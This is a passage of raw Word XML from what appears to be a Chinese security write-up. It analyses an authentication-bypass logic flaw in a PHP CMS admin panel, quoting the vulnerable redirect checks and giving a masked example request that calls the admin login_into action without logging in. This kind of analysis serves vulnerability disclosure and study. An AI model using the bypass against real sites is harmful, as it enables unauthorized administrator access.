          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>\public\class_connector.php:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s8800" type="#_x0000_t202" style="position:absolute;margin-left:80.7pt;margin-top:18.6pt;width:337.5pt;height:116.05pt;z-index:524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admin_purview() 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($this-&gt;fun-&gt;accept('archive', 'R')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</w:rPr>
                    <w:t>==</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-53"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'filemanage'</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-53"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>&amp;&amp;</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-51"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w: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'action',</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-51"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'R')</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-53"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>== 'batupfilesave') {</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:ind w:left="2928" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$ecisp_admininfo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'ecisp_admininfo', 'G');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Verdana"/>
          <w:sz w:val="27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799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928" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$esp_powerlist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'esp_powerlist', 'G');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2928" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$gettype = false;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r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$ecisp_admininfo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'ecisp_admininfo', 'C');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r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$esp_powerlist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'esp_powerlist', 'C');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r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$gettype = true;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 xml:space="preserve">$arr_purview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'|',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006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$ecisp_admininfo, 'DECODE', db_pscode));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2012" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$this-&gt;esp_powerlist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'|',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247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$esp_powerlist, 'DECODE', db_pscode));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list(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$this-&gt;</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>esp_adminuserid,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$this-&gt;esp_username, $this-&gt;esp_password,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$this-&gt;esp_useragent, $this-&gt;esp_powerid,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$this-&gt;esp_inputclassid, $this-&gt;esp_softurl)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$arr_purview;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($gettype) {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(empty($this-&gt;esp_username)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||</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-66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empty(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$this-&gt;esp_adminuserid)</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-64"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>||</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-66"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>md5(admin_AGENT)</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-66"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>!=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 xml:space="preserve">$this-&gt;esp_useragent || </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>md5(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>admin_ClassURL) !=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$this-&gt;esp_softurl) {</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="3630" w:right="882"/>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$condition = 0;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="957" w:right="882"/>
                    <w:jc w:val="center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3630" w:right="882"/>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$condition = 1;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="124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} else 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798" type="#_x0000_t202" style="width:337.5pt;height:458.3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(empty($this-&gt;</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>esp_username)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1247"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">|| </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>empty(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$this-&gt;esp_adminuserid) || md5(admin_ClassURL) != $this-&gt;esp_softurl) {</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="2"/>
                    <w:ind w:left="3843" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$condition = 0;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="957" w:right="882"/>
                    <w:jc w:val="center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$condition = 1;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($condition == 0) {</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="237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($this-&gt;fun-&gt;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'archive', 'R') != 'adminuser' &amp;&amp;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="161" w:right="880"/>
                    <w:jc w:val="center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'action', 'R') !=</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> 'login')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839" w:firstLine="3662"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>header(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'location: index.php?archive=adminuser&amp;action=login');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exit(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($condition == 1 &amp;&amp;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'point', 'R') == '' &amp;&amp;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'archive', 'R') == '' &amp;&amp;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accept(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'action', 'R') == '')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 w:firstLine="3662"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>header(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 xml:space="preserve">location: </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t xml:space="preserve">index.php?archive=management&amp;action=tab&amp;loadfun=mang </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>ercenter&amp;out=tabcenter');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exit(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1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="37"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>逻辑校验存在问题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="90"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve"> ($condition == 0) {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proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve"> ($this-&gt;fun-&gt;accept('archive', 'R') != 'adminuser' &amp;&amp;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="81"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>$this-&gt;fun-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>accept(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>'action', 'R') != 'login') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="83"/>
        <w:ind w:left="417" w:right="279"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>header(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>'location: index.php?archive=adminuser&amp;action=login');</w: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38" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="139"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>exit(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="83"/>
        <w:ind w:left="417"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="29"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:line="271" w:lineRule="auto"/>
        <w:ind w:right="337"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-75"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>archive=adminuser</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-75"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">action </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变量不等于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-72"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">login </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时就不会被跳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转到登录页。但是在文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-65"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">adminsoft\control\adminuser.php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s8797" type="#_x0000_t202" style="position:absolute;margin-left:80.7pt;margin-top:16.95pt;width:339.45pt;height:474.65pt;z-index:532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onlogin() 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</w:rPr>
                    <w:t>parent::start_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>template(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4"/>
                    <w:ind w:left="2012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($this-&gt;fun-&gt;accept('logoutid', 'C')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</w:rPr>
                    <w:t>== 1) {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/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$this-&gt;ectemplates-&gt;</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>assign(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'systemTitle',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lng[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'adminuser_login_lout_error']);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ind w:left="1095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setcookie(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'logoutid', 0);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/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$this-&gt;ectemplates-&gt;</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>assign(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'systemTitle',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lng[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'adminuser_login_login_error']);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2012"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$this-&gt;ectemplates-&gt;</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>display(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'login');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onlogin_into()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745" w:firstLine="1831"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>include_once admin_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>ROOT .</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> '/public/class_seccode.php';</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="10"/>
                    <w:rPr>
                      <w:rFonts w:ascii="MS Mincho"/>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:ind w:left="2012"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>list(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$new_seccode, $expiration)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"\t",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166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$_COOKIE['ecisp_seccode'], 'DECODE'));</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:ind w:left="2012"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$code = new </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>seccode(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2012"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>$code-&gt;</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>seccodeconvert(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$new_seccode); </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>parent::start_template();</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="2"/>
                    <w:ind w:left="2012"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$db_table = db_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>prefix .</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> "admin_member";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MS Mincho"/>
        </w:rPr>
        <w:sectPr w:rsidR="00292EF3">
          <w:footerReference w:type="default" r:id="rId62"/>
          <w:pgSz w:w="9980" w:h="14190"/>
          <w:pgMar w:top="1340" w:right="1380" w:bottom="1160" w:left="1380" w:header="0" w:footer="978" w:gutter="0"/>
          <w:pgNumType w:start="12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8796" type="#_x0000_t202" style="width:337.5pt;height:34.5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012" w:right="50"/>
                  </w:pPr>
                  <w:bookmarkStart w:id="64" w:name="cmseasy_逻辑缺陷可升级普通用户为管理员"/>
                  <w:bookmarkStart w:id="65" w:name="_bookmark30"/>
                  <w:bookmarkEnd w:id="64"/>
                  <w:bookmarkEnd w:id="65"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$linkURL = $_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>SERVER[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>HTTP_REFERER'];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7"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:before="35" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还可以调用该类的其他方法，如方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-71"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>onlogin_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>into()</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="136" w:line="352" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">**.**.**.**/adminsoft/index.php?archive=adminuser&amp;acti </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>on=login_into</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317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也就是可以调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-64"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">adminuser.php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>这个后台文件的其他功能。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
